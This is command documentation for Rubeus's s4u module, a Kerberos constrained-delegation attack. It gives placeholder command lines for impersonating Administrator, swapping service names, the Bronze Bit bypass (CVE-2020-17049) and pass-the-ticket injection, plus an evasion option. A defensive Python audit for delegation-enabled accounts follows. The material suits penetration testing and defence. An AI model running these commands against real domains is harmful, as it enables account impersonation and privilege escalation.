s4u

Perform S4U2self and/or S4U2proxy constrained delegation abuse. Used to impersonate any user to services an account is configured to delegate to.

Usage

# Using existing TGT
Rubeus.exe s4u </ticket:<ticket> | /ticket:<file>.kirbi> </impersonateuser:<username> | /tgs:<ticket> | /tgs:<file>.kirbi> /msdsspn:<spn> [/altservice:<spn>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/opsec] [/self] [/proxyurl:<url>] [/createnetonly:C:\Windows\System32\cmd.exe] [/show]

# Using account hash (auto-requests TGT first)
Rubeus.exe s4u /user:<username> </rc4:<rc4> | /aes256:<aes256-key>> [/domain:<domain>] </impersonateuser:<username> | /tgs:<ticket>...> /msdsspn:<spn> [/altservice:<spn>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac] [/proxyurl:<url>]

# Cross-domain S4U
Rubeus.exe s4u /user:<username> </rc4:<rc4> | /aes256:<aes256-key>> [/domain:<domain>] </impersonateuser:<username>...> /msdsspn:<spn> /targetdomain:<domain> /targetdc:<dc-fqdn> [/altservice:<spn>] [/dc:<dc-ip>] [/nowrap] [/self] [/nopac]

Options

  • /ticket:<ticket> - existing TGT (base64 or .kirbi path)
  • /user:<username> - account with constrained delegation configured
  • /rc4:<rc4> - RC4/NTLM hash of the account
  • /aes256:<aes256-key> - AES256 key of the account
  • /domain:<domain> - domain of the account
  • /impersonateuser:<username> - user to impersonate (required)
  • /msdsspn:<spn> - target SPN in msds-allowedtodelegateto
  • /tgs:<ticket> - S4U2self TGS to use for the S4U2proxy step
  • /altservice:<spn> - substitute an alternate service name in the final ticket (sname swap)
  • /dc:<dc-ip> - domain controller to target
  • /ptt - pass-the-ticket, apply the final ticket to the current session
  • /outfile:<output> - save ticket to file
  • /nowrap - don't line-wrap the base64 output
  • /opsec - form requests so they blend in with genuine Windows Kerberos traffic (AES256 only)
  • /self - S4U2self only (no S4U2proxy)
  • /bronzebit - flip the forwardable flag (CVE-2020-17049); requires the service key
  • /nopac - request the initial TGT without a PAC
  • /targetdomain:<domain> - cross-domain target domain
  • /targetdc:<dc-fqdn> - cross-domain target DC
  • /createnetonly:<exe> - apply the ticket to a sacrificial process
  • /proxyurl:<url> - KDC proxy URL

Examples

# Full chain: TGT request + S4U2self + S4U2proxy + inject
Rubeus.exe s4u /user:<username> /rc4:<rc4> /impersonateuser:Administrator /msdsspn:"ldap/<dc-ip>" /altservice:cifs /ptt

# Supply existing TGT, run S4U2self only
Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Administrator

# Supply TGT + S4U2self TGS, run S4U2proxy
Rubeus.exe s4u /ticket:<ticket> /msdsspn:"ldap/<computer>.<domain>" /tgs:<ticket>

# Cross-domain S4U
Rubeus.exe s4u /user:<username> /aes256:<aes256-key> /domain:<domain> /impersonateuser:<target-user> /msdsspn:<spn> /targetdomain:<domain> /targetdc:<dc-fqdn>

# S4U2self referral (forge, no S4U2proxy)
Rubeus.exe s4u /self /targetdomain:<domain> /dc:<dc-ip> /impersonateuser:<username> /domain:<domain> /altservice:host/<computer>.<domain> /nowrap /ticket:<ticket>

# Bronze Bit (CVE-2020-17049)
Rubeus.exe s4u /user:<username> /aes256:<aes256-key> /impersonateuser:<target-user> /msdsspn:<spn> /bronzebit /ptt

Notes

  • Account needs TrustedToAuthForDelegation in userAccountControl and a value in msds-allowedtodelegateto
  • /altservice exploits Alberto Solino's sname-not-protected-in-KRB-CRED discovery - the server name IS protected, the service name is NOT
  • Multiple altservices: /altservice:cifs,HOST,ldap
  • /self + /altservice useful for local privilege escalation (delegate-to-self abuse)
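To inventory which accounts meet the precondition in the first note, here is an added Python audit example (not Rubeus code); the sample records, account names and hostnames are constructed placeholders, and the two userAccountControl flag values are the standard ones. It reports exposed hosts rather than full SPNs because, as the second note says, only the server name in the ticket is protected, so the listed service class is not a meaningful boundary.

```python
# Audit: find accounts able to perform S4U constrained delegation and the
# hosts reachable through them (standard userAccountControl bit values).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self)
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST = 0x1000

# Constructed sample records shaped like LDAP attribute dictionaries; the
# names and hostnames are placeholders, not real directory data.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_web",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["ldap/dc01.corp.example",
                                  "ldap/dc01.corp.example/corp.example"]},
    {"sAMAccountName": "svc_app", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["cifs/files01.corp.example:445"]},
    {"sAMAccountName": "WEB02$",
     "userAccountControl": WORKSTATION_TRUST | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]

def spn_host(spn):
    """Host part of 'class/host[:port][/servicename]', lower-cased."""
    parts = spn.split("/")
    host = parts[1] if len(parts) > 1 else parts[0]
    return host.split(":")[0].lower()

def classify(acct):
    """Delegation type implied by userAccountControl and the target list."""
    uac = acct["userAccountControl"]
    targets = acct.get("msDS-AllowedToDelegateTo") or []
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"  # S4U2self + S4U2proxy
    if targets:
        return "constrained-kerberos-only"        # needs forwardable user ticket
    return "none"

def audit(accounts):
    """Map account name -> (delegation type, sorted list of exposed hosts)."""
    findings = {}
    for acct in accounts:
        kind = classify(acct)
        if kind != "none":
            targets = acct.get("msDS-AllowedToDelegateTo") or []
            findings[acct["sAMAccountName"]] = (kind, sorted({spn_host(s) for s in targets}))
    return findings
```

Accounts in the "constrained-protocol-transition" bucket are the ones this command targets directly; "constrained-kerberos-only" accounts still warrant review because of the /bronzebit note above.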